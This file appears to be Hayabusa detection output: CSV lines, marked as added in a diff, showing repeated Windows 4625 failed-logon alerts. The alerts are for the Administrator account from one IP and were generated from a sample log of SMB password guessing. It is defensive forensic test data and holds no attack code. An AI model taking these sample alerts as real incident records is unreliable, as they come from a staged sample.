+2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ouHvw1LXTN3OSFYb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tZIB1QO7hfugceJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u4QU2BQ0u5tJsdjG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0P7NKiKCmLvu6L1L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4obkK4RfsLZe5gdi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JRUDpDLhgop8d1el | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LvdsNkFqfFWRePXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5wvd8c1jYrEZMcKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AWvECxgkvWdg9Zdc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lHHPOAYSMSp3BhX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rJicXUMfrx9BOzHI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eybrQWvrvwSkNADJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VVMPCaQB0XteDSwC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lbjjLoATZE6KPIQv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tips954DRcYeIB2T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nLe9aMiMz0akxfWW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: csroGB9KZOZkb5sY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Zl4Rc25RsvJ7Y9H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C5CxqCFOIJBMZCD6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gVPwxpR05F3B5aXp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nP317UkK2DhTD5Rd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ir3c7dqXm1LhbfqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1U1QZiJSrEufxF3b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HZnDnDhTPuC9n5A1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72gY1ClzwuisAhKW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nrneLGOZCwPIeQgT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dm3gGV2yR4B3yrJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fzeklLG1KCTE5FpP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uZPwxCw3EWy9NShk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MalB3OcsOsRaMtS3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XMZMqCYPHO3n4RIh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1VUeIuU1rQPISNA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: md4ioB8wNiaz2EKB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nM8QaFeqwDfJZ1gc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlR75rMhpLnfQZbC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WF8BcOe4YUDYTXkj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FK0Iiao20PyPmtTk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kQbCbAHrQilFmMZP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VUdXQOw98VVoksDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fISqpC8eKlaQGabv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s5Y0VryMAHjtB3n2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bsjAHlztFIC8tBt0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CiEQlAlTOhqOKpmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i7lUqZMROQXNUtQm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0eFCGEtOLzjUxI5v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CqfOAGcVcwSgaeo3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2hcqVJzkVgvUnebk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9ZpqiTGXqJlAQTZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qCzXKlJ2vPeqqdfa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tITW0ihpErFk3nKp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MdQqr1T4frPNlulf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: niiXRpP5AVHpG9Hu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EThR98jZUdwNxbXQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBsJcIw859FfEkLD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kG4Tv5vauSWhbj8F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 453tjgRGMu46vC33 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1fnzhhfszxJWxLCT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWPkeL8TnAbC1nSV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JrDmUzyK4Xxx6Jn1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bMTf9D2yjumfS9LM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8cCs65ithseTCORa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QBrGAScjpAdScGmJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n90F99qBpmUUVLId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MLeOkIG0hVHIOnN7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vVx5uUtkaFIf7PWZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kgd7lCQUQ3dHN18S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b8m2MmpFVK9Uojp7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F0NZjeu3lb5xddVQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YjjXBZnyWt0ljzpv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sinFBozyUR0sBadM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Au22Y0LIuvTmZDpy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QDWW3VfZ7rKayV2v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zPgaFDZtc5wEupnq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TpYZc2TTDfJFnPHo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
